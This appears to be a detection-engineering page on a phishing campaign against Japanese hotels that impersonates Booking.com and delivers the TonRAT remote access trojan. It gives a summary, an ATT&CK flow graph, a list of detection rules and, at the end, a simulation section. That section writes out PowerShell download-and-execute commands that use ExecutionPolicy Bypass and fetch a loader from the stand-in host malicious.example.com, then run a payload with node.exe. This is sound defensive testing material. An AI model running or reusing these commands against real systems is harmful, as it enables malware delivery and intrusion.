Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A phishing campaign posing as Booking.com targeted hotel operators in Japan through infrastructure hosted on Calendly and SendGrid. The email included a shortened link that led to a ZIP archive containing a malicious LNK shortcut, which then launched a PowerShell-based loader. That loader retrieved additional PowerShell scripts, decrypted a JavaScript payload identified as TonRAT, downloaded Node.js, and executed the RAT. The malware then established command-and-control through a WebSocket endpoint obtained via the TON API.
Investigation
The report outlines the email header analysis, the abuse of legitimate delivery services, and the full multi-stage execution chain used in the attack. It provides file hashes for the ZIP archive and its internal components and lists the command-and-control domains observed during analysis. The investigation also includes technical details on the malicious LNK file and the PowerShell commands used to progress the infection.
Mitigation
Defenders should block suspicious Calendly short links, verify sender domains carefully, and restrict execution of LNK attachments delivered through email. Monitoring should also focus on unauthorized PowerShell activity and unexpected Node.js binaries appearing on endpoints. URL filtering can help block access to the known malicious domains involved in the campaign.
Response
Security teams should create detections for PowerShell commands that download content from the identified command-and-control domains and for execution of node.exe from unusual locations. Alerts should also be configured for email flows using SendGrid headers from untrusted or unexpected sources. Investigators should collect dropped files and preserve network traffic associated with the observed WebSocket communications.
"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#cccccc %% Nodes action_phishing["<b>Action</b> – <b>T1566.002 Spearphishing Link</b><br/>Phishing email containing a malicious Calendly link is sent to the victim."] class action_phishing action action_user_click["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>Victim clicks the malicious Calendly link, causing the browser to download a ZIP archive."] class action_user_click action action_download_zip["<b>Action</b> – Download ZIP<br/>ZIP archive contains a shortcut (.lnk) and a dummy MP4 file."] class action_download_zip action action_open_shortcut["<b>Action</b> – <b>T1547.009 Shortcut Modification</b><br/>Victim opens the .lnk shortcut, which executes a PowerShell command."] class action_open_shortcut action tool_powershell["<b>Tool</b> – PowerShell<br/><b>Purpose</b>: Executes commands and downloads additional payloads."] class tool_powershell tool action_download_script["<b>Action</b> – <b>T1105 Ingress Tool Transfer</b><br/>PowerShell downloads an additional script from a remote server."] class action_download_script action action_download_js["<b>Action</b> – <b>T1027.009 Embedded Payloads</b><br/>PowerShell also downloads an encrypted JavaScript payload."] class action_download_js action action_download_node["<b>Action</b> – Download Node.js Runtime<br/>Node.js runtime is downloaded and used to launch the next stage."] class action_download_node process malware_tonrat["<b>Malware</b> – TonRAT<br/>JavaScriptu2011based remote access trojan executed via Node.js."] class malware_tonrat malware action_dynamic_resolution["<b>Action</b> – <b>T1568 Dynamic Resolution</b><br/>TonRAT queries the TON API to resolve commandu2011andu2011control domains at runtime."] class action_dynamic_resolution action action_c2["<b>Action</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/>Establishes a WebSocket channel for C2 communications."] class action_c2 action %% Connections action_phishing –>|leads_to| action_user_click action_user_click –>|triggers| action_download_zip action_download_zip –>|contains| action_open_shortcut action_open_shortcut –>|executes| tool_powershell tool_powershell –>|uses| action_download_script tool_powershell –>|uses| action_download_js action_download_script –>|provides| action_download_node action_download_js –>|provides| action_download_node action_download_node –>|launches| malware_tonrat malware_tonrat –>|performs| action_dynamic_resolution action_dynamic_resolution –>|enables| action_c2 "
Attack Flow
Detections
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
View
Possible Malicious LNK File with Double Extension (via cmdline)
View
The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
View
Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline)
View
Possible Powershell Obfuscation Indicators (via powershell)
View
IOCs (SourceIP) to detect: Analysis of Suspicious Emails Targeting the Hotel Industry (Part 1: Campaign Overview)
View
IOCs (DestinationIP) to detect: Analysis of Suspicious Emails Targeting the Hotel Industry (Part 1: Campaign Overview)
View
Detection of Phishing Emails Impersonating Booking.com via Calendly [Email]
View
Detect TonRAT Deployment via PowerShell and Node.js Runtime [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
-
Initial Access – PowerShell Download
The attacker obtains a PowerShell remote session on the compromised host and usesInvoke-WebRequestto pull the TonRAT loader script from a malicious C2 server. This step satisfies theInvoke-WebRequeststring match.powershell -NoProfile -ExecutionPolicy Bypass -Command ^ "Invoke-WebRequest -Uri http://malicious.example.com/tonrat.ps1 -OutFile $env:TEMPtonrat.ps1" -
Execution of the Loader
The downloaded script is executed, which in turn spawns a second PowerShell process to run additional commands (still containing the literal “PowerShell”).powershell -NoProfile -ExecutionPolicy Bypass -File $env:TEMPtonrat.ps1 -
Node.js Payload Execution
TonRAT drops a malicious JavaScript file (malicious.js) and launches it with the Node.js runtime (node.exe). This generates thenode.exestring match.# Assume the script already placed malicious.js in C:Temp C:Program Filesnodejsnode.exe C:Tempmalicious.js
The three process creations (PowerShell with
Invoke-WebRequest, PowerShell executing the loader, andnode.exe) collectively satisfy the detection rule’s condition. -
-
Regression Test Script:
#------------------------------------------------- # TonRAT Deployment Simulation – triggers Sigma rule #------------------------------------------------- $tempDir = "$env:TEMPtonrat_demo" New-Item -ItemType Directory -Path $tempDir -Force | Out-Null # 1. Download fake loader (simulated with a simple echo) $loaderUrl = "http://malicious.example.com/tonrat.ps1" $loaderPath = "$tempDirtonrat.ps1" Invoke-WebRequest -Uri $loaderUrl -OutFile $loaderPath -UseBasicParsing # 2. Execute the loader (the loader just creates a dummy js file) powershell -NoProfile -ExecutionPolicy Bypass -File $loaderPath # 3. Create a dummy JavaScript payload $jsPath = "C:Tempmalicious.js" Set-Content -Path $jsPath -Value "console.log('Malicious payload executed');" # 4. Run the payload with Node.js $nodePath = "C:Program Filesnodejsnode.exe" & $nodePath $jsPath #------------------------------------------------- -
Cleanup Commands:
# Remove all artifacts created by the simulation Remove-Item -Path "$env:TEMPtonrat_demo" -Recurse -Force Remove-Item -Path "C:Tempmalicious.js" -Force # Optionally kill any lingering PowerShell/Node processes (if needed) Get-Process -Name "powershell","node" -ErrorAction SilentlyContinue | Stop-Process -Force